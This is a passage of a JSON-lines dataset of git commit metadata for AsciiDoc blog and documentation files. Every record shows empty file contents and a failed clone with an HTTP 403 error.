Existed...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-30-4%20Unique%20Gadgets%20You%20Didn't%20Know%20Existed....adoc","new_file":"_posts\/2017-12-30-4%20Unique%20Gadgets%20You%20Didn't%20Know%20Existed....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8279780dbb5e8fecacdecb61cbe8f77f05120527","subject":"Updage plan","message":"Updage plan\n","repos":"mdenchev\/mui","old_file":"plan.adoc","new_file":"plan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdenchev\/mui.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e005aed0e897923bb41140d43dcea6c5ad0b8487","subject":"added main ood file","message":"added main ood file\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"OOD.adoc","new_file":"OOD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"f79bf48d80d9b1ae31869f39ed0fb1f0a747eb42","subject":"Update 2017-04-13-aaa.adoc","message":"Update 2017-04-13-aaa.adoc","repos":"s-f-ek971\/s-f-ek971.github.io,s-f-ek971\/s-f-ek971.github.io,s-f-ek971\/s-f-ek971.github.io,s-f-ek971\/s-f-ek971.github.io","old_file":"_posts\/2017-04-13-aaa.adoc","new_file":"_posts\/2017-04-13-aaa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/s-f-ek971\/s-f-ek971.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97d4994f2e0e77fb51dae36cf835e8f05d4b545a","subject":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","message":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f60160207939210aaef7019f4edfb98cab91b7c0","subject":"Update 2016-12-14-The-Story-CS-Chapter-NIE.adoc","message":"Update 2016-12-14-The-Story-CS-Chapter-NIE.adoc","repos":"IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog","old_file":"_posts\/2016-12-14-The-Story-CS-Chapter-NIE.adoc","new_file":"_posts\/2016-12-14-The-Story-CS-Chapter-NIE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IEEECompute\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91d576fb1c3b504c0c96e46fc1ff0f740a6c99f4","subject":"Update 2015-02-20-El-Gran-libro-de-HTML5-CSS3-y-JavaScript.adoc","message":"Update 
2015-02-20-El-Gran-libro-de-HTML5-CSS3-y-JavaScript.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-02-20-El-Gran-libro-de-HTML5-CSS3-y-JavaScript.adoc","new_file":"_posts\/2015-02-20-El-Gran-libro-de-HTML5-CSS3-y-JavaScript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89484e1bcd5e2425a2ff7eff6c73e3fafbe93d5d","subject":"Update 2015-01-01-App-help-page.adoc","message":"Update 2015-01-01-App-help-page.adoc","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2015-01-01-App-help-page.adoc","new_file":"_posts\/2015-01-01-App-help-page.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7e53bc57a119a59049b1ee15b89239e01217787","subject":"Update 2015-06-25-Die-neue-Beta.adoc","message":"Update 2015-06-25-Die-neue-Beta.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9096158dbb93c6440afb883acec3f91b4f047c4b","subject":"Update 2015-02-24-new-post.adoc","message":"Update 2015-02-24-new-post.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-new-post.adoc","new_file":"_posts\/2015-02-24-new-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4eb9367fbeb900398cb29890d30c82ed1013e527","subject":"Update 2016-02-02-CONCEPTS.adoc","message":"Update 2016-02-02-CONCEPTS.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-02-CONCEPTS.adoc","new_file":"_posts\/2016-02-02-CONCEPTS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"199b29b74df1d130280853329ff64d471fc43fb3","subject":"Update 2017-06-08-shortage.adoc","message":"Update 2017-06-08-shortage.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-06-08-shortage.adoc","new_file":"_posts\/2017-06-08-shortage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5050a27fbae887135c8325a496db7b728096a3b7","subject":"Update 2015-11-16-Episode-32-Zen-and-the-Art-of-Digital-Pinball.adoc","message":"Update 
2015-11-16-Episode-32-Zen-and-the-Art-of-Digital-Pinball.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-11-16-Episode-32-Zen-and-the-Art-of-Digital-Pinball.adoc","new_file":"_posts\/2015-11-16-Episode-32-Zen-and-the-Art-of-Digital-Pinball.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2044d1039a375e94598bd65614848ce6d54ee194","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc54c2aa8788d147d981947427ca91a3fade9749","subject":"Fixed floating ip description in README","message":"Fixed floating ip description in README\n\nFixes: #226\n","repos":"markllama\/openshift-on-openstack,markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f663f744027289441fd4faf191092c6a8c475c02","subject":"Add travis-ci build status","message":"Add travis-ci build status\n","repos":"cinhtau\/kaffee-pelion","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cinhtau\/kaffee-pelion.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c51681b52d98b5a9e9290583c8a42244aa7a44f9","subject":"Add a basic README.adoc file","message":"Add a basic README.adoc file\n","repos":"wildfly\/wildfly-common","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly\/wildfly-common.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1d0f6612231baa5ceef5753c2d7a77fc4115bc59","subject":"Update 2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","message":"Update 2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","new_file":"_posts\/2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable 
to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bb5adf52f4d9d4b8aab71bfa4221196c2ad3639","subject":"Update 2015-09-17-drupal_add_js-JavaScript.adoc","message":"Update 2015-09-17-drupal_add_js-JavaScript.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2015-09-17-drupal_add_js-JavaScript.adoc","new_file":"_posts\/2015-09-17-drupal_add_js-JavaScript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0a2b392cd3f8a75bdbe4425b6428efa560a7d6f","subject":"Blog Hawkular APM OpenTracing Javascript (#252)","message":"Blog Hawkular APM OpenTracing Javascript (#252)\n\n","repos":"pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/11\/16\/hawkular-apm-opentracing-js.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/11\/16\/hawkular-apm-opentracing-js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5c6db7c99d9178a722145349ed5710f6d12332bb","subject":"y2b create post Nintendo On Your Phone!","message":"y2b create post Nintendo On Your Phone!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-27-Nintendo-On-Your-Phone.adoc","new_file":"_posts\/2016-04-27-Nintendo-On-Your-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"788b62d9a9b3a2a57bd5807b46cdbe5d873ddb5a","subject":"Update 2014-04-22-Commit-messages.adoc","message":"Update 2014-04-22-Commit-messages.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-04-22-Commit-messages.adoc","new_file":"_posts\/2014-04-22-Commit-messages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9c88eae6dde7b347ff30d3a23c0a4f35cb28bbf","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 
2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"433ce7b08ab1be11e7ea6006ac4fbf284cda91e8","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b609e45c55a9d520ed5c7f374d73ba30caf7958","subject":"Update 2017-11-17-Trying-to-keep-somewhat-productive-and-positive.adoc","message":"Update 2017-11-17-Trying-to-keep-somewhat-productive-and-positive.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-11-17-Trying-to-keep-somewhat-productive-and-positive.adoc","new_file":"_posts\/2017-11-17-Trying-to-keep-somewhat-productive-and-positive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fcda8f7034a55bc06c226cfcfd8e824930feba8","subject":"y2b create post Shure SRH750DJ Headphones Unboxing","message":"y2b create post Shure SRH750DJ Headphones Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-06-08-Shure-SRH750DJ-Headphones-Unboxing.adoc","new_file":"_posts\/2011-06-08-Shure-SRH750DJ-Headphones-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70cec12c53ac2fdae4a4ffea002361e1fdb7e76d","subject":"y2b create post Razer Blade Gaming Laptop Hands On","message":"y2b create post Razer Blade Gaming Laptop Hands On","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-12-Razer-Blade-Gaming-Laptop-Hands-On.adoc","new_file":"_posts\/2012-01-12-Razer-Blade-Gaming-Laptop-Hands-On.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c94073e93fe0f3972cd0ebd3b5146fad34d80f64","subject":"Update 2015-11-20-Da-Dom-huck-sieht-etwas-anders-aus.adoc","message":"Update 
2015-11-20-Da-Dom-huck-sieht-etwas-anders-aus.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2015-11-20-Da-Dom-huck-sieht-etwas-anders-aus.adoc","new_file":"_posts\/2015-11-20-Da-Dom-huck-sieht-etwas-anders-aus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ee2f41b5b50c3087806747626b11b4533ab5ac1","subject":"Publish 2015-5-10-uGUI.adoc","message":"Publish 2015-5-10-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGUI.adoc","new_file":"2015-5-10-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5eeb2e04b0366097d06173cdd4cbe108859685a8","subject":"6.0.0-beta2 Release Notes","message":"6.0.0-beta2 Release Notes\n","repos":"takezoe\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/appendix\/release-notes\/6.0.0-beta-2.adoc","new_file":"docs\/src\/reference\/asciidoc\/appendix\/release-notes\/6.0.0-beta-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elastic\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"366d48fc5a83fe37739ea4325962d908cdb827df","subject":"Update 2019-05-17-3-Learning-Representations-through-Causal-Invariance.adoc","message":"Update 2019-05-17-3-Learning-Representations-through-Causal-Invariance.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-05-17-3-Learning-Representations-through-Causal-Invariance.adoc","new_file":"_posts\/2019-05-17-3-Learning-Representations-through-Causal-Invariance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f908e3c8d09343922807b97929cded0d4b10587","subject":"use mysql repleace apache db","message":"use mysql repleace apache db\n","repos":"jbosschina\/openshift-cookbooks","old_file":"jboss\/fuse\/fuse-all-in-one.adoc","new_file":"jboss\/fuse\/fuse-all-in-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosschina\/openshift-cookbooks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4c8ec1780b5d0ee991506c031749fb65bf80a10","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0504c01a16ad13edd6d4040cdd21ee1dd20bd2b","subject":"Update 2016-07-03-Rock-climbing-the-day-after.adoc","message":"Update 2016-07-03-Rock-climbing-the-day-after.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-03-Rock-climbing-the-day-after.adoc","new_file":"_posts\/2016-07-03-Rock-climbing-the-day-after.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1399d0ac2196113b8479d1ed34f6723b3685c86c","subject":"Update 2015-05-31-Schreiben-Basic.adoc","message":"Update 2015-05-31-Schreiben-Basic.adoc","repos":"teilautohall\/teilautohall.github.io,teilautohall\/teilautohall.github.io,teilautohall\/teilautohall.github.io","old_file":"_posts\/2015-05-31-Schreiben-Basic.adoc","new_file":"_posts\/2015-05-31-Schreiben-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/teilautohall\/teilautohall.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89a10cfd8591092d2b6eaca45a20390b4c192eb6","subject":"Update 2016-08-19-Hello-everybody.adoc","message":"Update 2016-08-19-Hello-everybody.adoc","repos":"mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io","old_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkorevec\/mkorevec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef5cacac24f7c9bd56d5b9bb3e6a858ee9b145c5","subject":"Update 2019-01-31-Your-Blog-title.adoc","message":"Update 2019-01-31-Your-Blog-title.adoc","repos":"mrfgl\/blog,mrfgl\/blog,mrfgl\/blog,mrfgl\/blog","old_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrfgl\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fda94ef9a4a654e9db07b4d299e7a86a36c928b2","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46d5fe1bbf43f6f7c19045604ec50635d46695ef","subject":"Update 2015-09-13-Is-your-router-part-of-a-botnet.adoc","message":"Update 
2015-09-13-Is-your-router-part-of-a-botnet.adoc","repos":"suedadam\/suedadam.github.io,suedadam\/suedadam.github.io,suedadam\/suedadam.github.io","old_file":"_posts\/2015-09-13-Is-your-router-part-of-a-botnet.adoc","new_file":"_posts\/2015-09-13-Is-your-router-part-of-a-botnet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/suedadam\/suedadam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b03c08370e7aefcff681b556526caf943fde1d21","subject":"Renamed '_posts\/2017-09-19-Adding-about-page-to-hubpressio.adoc' to '_posts\/2017-09-19-adding-about-page-to-hupbressio.adoc'","message":"Renamed '_posts\/2017-09-19-Adding-about-page-to-hubpressio.adoc' to '_posts\/2017-09-19-adding-about-page-to-hupbressio.adoc'","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-09-19-adding-about-page-to-hupbressio.adoc","new_file":"_posts\/2017-09-19-adding-about-page-to-hupbressio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efc99c4bc80a5edd29ff62289dae29eb63a23a1f","subject":"Update 2018-04-16-When-is-a-Blockchain-compelling.adoc","message":"Update 2018-04-16-When-is-a-Blockchain-compelling.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-04-16-When-is-a-Blockchain-compelling.adoc","new_file":"_posts\/2018-04-16-When-is-a-Blockchain-compelling.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"398682929e102cd16d96689cbabc72a4f7bc2656","subject":"Update 2016-07-08-Word-Press-3.adoc","message":"Update 2016-07-08-Word-Press-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fc51f842c9540488116cbe8e5a83176a56bc78b","subject":"Update 2015-09-24-Aspectos-importantes-del-UX.adoc","message":"Update 2015-09-24-Aspectos-importantes-del-UX.adoc","repos":"AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io","old_file":"_posts\/2015-09-24-Aspectos-importantes-del-UX.adoc","new_file":"_posts\/2015-09-24-Aspectos-importantes-del-UX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlonsoCampos\/AlonsoCampos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b76c250a9a7540dc0f1d4f87672f4d7db2e968e8","subject":"Update 2017-03-16-What-init-system-am-I-using.adoc","message":"Update 
2017-03-16-What-init-system-am-I-using.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-16-What-init-system-am-I-using.adoc","new_file":"_posts\/2017-03-16-What-init-system-am-I-using.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ca9ea7107ee1e0e7c4166a62aa2994cf8dd5436","subject":"Update 2017-05-04-gabe-is-starting-to-feel-it.adoc","message":"Update 2017-05-04-gabe-is-starting-to-feel-it.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-05-04-gabe-is-starting-to-feel-it.adoc","new_file":"_posts\/2017-05-04-gabe-is-starting-to-feel-it.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cbe06d4b07166109a4ca7dfe7f79f6e050d4e3c","subject":"0.8.0.Beta1 release announcement","message":"0.8.0.Beta1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2018-06-21-debezium-0-8-0-beta1-released.adoc","new_file":"blog\/2018-06-21-debezium-0-8-0-beta1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 